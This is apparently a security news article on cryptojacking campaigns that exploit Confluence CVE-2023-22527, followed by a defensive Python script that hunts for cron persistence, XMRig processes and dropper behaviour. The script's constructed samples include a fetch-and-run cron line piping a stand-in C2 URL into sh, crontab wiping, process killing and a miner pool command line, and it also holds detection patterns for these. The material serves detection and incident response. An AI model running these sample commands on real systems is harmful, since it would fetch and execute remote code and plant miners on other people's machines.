Threat actors are actively exploiting a critical, already-patched vulnerability in Atlassian Confluence Data Center and Confluence Server to run unauthorized cryptocurrency mining (cryptojacking) on instances that have not been upgraded.
According to Trend Micro researcher Abdelrahman Esmail, the attackers combine several techniques: dropping shell scripts, running XMRig miners, targeting SSH endpoints, and killing competing cryptomining processes already present on the host. For persistence, they install cron jobs.
The exploited vulnerability is CVE-2023-22527, a critical-severity template injection flaw in out-of-date Confluence releases (8.0.x through 8.5.3) that allows unauthenticated remote code execution. Atlassian published a fix in mid-January 2024.
Trend Micro observed a spike in exploitation attempts from mid-June to late July 2024, with attackers using the flaw to deploy the XMRig miner on unpatched systems. Its telemetry suggests that at least three distinct threat actors are behind the activity.
In one attack path, the XMRig miner is launched through a crafted ELF payload triggered by specific requests. In another, a shell script first terminates competing cryptojacking processes, removes all existing cron jobs, uninstalls the cloud service providers' security agents, and collects system information; it then registers a new cron job that contacts the command-and-control server every five minutes and starts the miner.
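The persistence and cleanup behaviour described in the two paragraphs above (cron-based persistence, killing rival miners, wiping and re-installing crontabs, XMRig command lines) is something a responder can hunt for on a suspected Confluence host. The following Python script is an added example, not code from this article or from Trend Micro: it scans text captures (the output of `crontab -l`, `ps -eo pid,user,args`, and a recovered dropper script) for those behaviours. The crontab, process listing and dropper below are constructed samples rather than captures from the campaign, and the indicator patterns, the 15-minute interval threshold and the bare-IP URL heuristic are the author's assumptions, not published IOCs.

```python
"""Hunt for the tradecraft described above on a suspected Confluence host.

Inputs are text captures (e.g. `crontab -l`, `ps -eo pid,user,args`, a dropped
script); the samples below are constructed, not from the campaign, and the
indicator patterns are assumptions, not Trend Micro's published IOCs."""
import re

# "*/N * * * *" schedules; reported when N is at or below the (assumed) threshold.
SHORT_INTERVAL = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*$")
# curl/wget piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")
# URLs that address a bare IPv4 host instead of a hostname.
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
# Strings common in XMRig-style command lines (assumed indicators).
MINER_HINTS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level")
# Dropper behaviours named in the report; vendor-specific cloud-agent
# uninstall commands are deliberately not guessed here.
BEHAVIOURS = {
    "kills competing processes": re.compile(r"\b(?:pkill|killall)\b|\bkill\s+-9\b"),
    "wipes existing crontab": re.compile(r"\bcrontab\s+-r\b"),
    "installs new crontab": re.compile(r"\|\s*crontab\s+-\s*$", re.M),
    "profiles host hardware": re.compile(r"\b(?:uname|nproc|lscpu)\b|/proc/cpuinfo"),
}


def parse_crontab(text):
    """Return (schedule, command) pairs from user-crontab text (no user field)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and VAR=value environment lines.
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            entries.append((" ".join(parts[:5]), parts[5]))
    return entries


def cron_findings(text, max_minutes=15):
    """Flag entries that fetch-and-run, contact a bare IP or mention a miner.

    A short interval alone is normal for monitoring jobs, so it is only
    reported as context alongside one of the content signals."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        m = SHORT_INTERVAL.match(schedule)
        if m and int(m.group(1)) <= max_minutes:
            reasons.append(f"runs every {m.group(1)} min")
        if FETCH_AND_RUN.search(command):
            reasons.append("downloads and executes remote content")
        if RAW_IP_URL.search(command):
            reasons.append("contacts a bare-IP URL")
        if any(h in command.lower() for h in MINER_HINTS):
            reasons.append("miner indicator in command")
        if any(not r.startswith("runs every") for r in reasons):
            findings.append((schedule, command, reasons))
    return findings


def miner_processes(ps_text):
    """Return lines of a `ps -eo pid,user,args` capture that look like miners."""
    return [line.strip() for line in ps_text.splitlines()[1:]
            if any(h in line.lower() for h in MINER_HINTS)]


def script_behaviours(script):
    """Name the dropper behaviours present in a captured shell script."""
    return sorted(name for name, rx in BEHAVIOURS.items() if rx.search(script))


# Constructed samples; 203.0.113.10 is a documentation-only address.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/10 * * * * /opt/monitor/agent --check
*/5 * * * * curl -fsSL http://203.0.113.10/c2.sh | sh >/dev/null 2>&1
"""
SAMPLE_PS = """\
  PID USER       COMMAND
  812 root       /usr/sbin/sshd -D
 2049 confluence /opt/atlassian/confluence/jre/bin/java -Xms1024m
 3190 confluence /tmp/.x/kthreadd -o stratum+tcp://pool.example.net:3333 --donate-level 1
"""
SAMPLE_DROPPER = """\
#!/bin/sh
pkill -9 -f xmrig; pkill -9 -f kdevtmpfsi
crontab -r
uname -a; nproc; grep -m1 'model name' /proc/cpuinfo
(crontab -l 2>/dev/null; echo '*/5 * * * * curl -fsSL http://203.0.113.10/c2.sh | sh') | crontab -
"""

if __name__ == "__main__":
    for schedule, command, reasons in cron_findings(SAMPLE_CRONTAB):
        print(f"CRON  {schedule} :: {command}\n      {'; '.join(reasons)}")
    for line in miner_processes(SAMPLE_PS):
        print(f"PROC  {line}")
    print("DROPPER:", ", ".join(script_behaviours(SAMPLE_DROPPER)))
```

On a real host, feed `cron_findings` the crontab of every account (including the Confluence service user and root) and the files under `/etc/cron.d`, and run `miner_processes` over a full process listing; a renamed XMRig binary such as the `kthreadd` in the sample still gives itself away by its pool and donation arguments. The heuristics are deliberately noisy in the direction of false positives, which is the right trade-off for triage after a known exposure window.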
Esmail notes that the continued exploitation of CVE-2023-22527 poses a serious security risk to organizations worldwide. Administrators should upgrade Confluence Data Center and Confluence Server to a fixed version without delay; instances that were exposed while unpatched should also be checked for the cron persistence and miner artifacts described above rather than assumed clean once the upgrade is applied.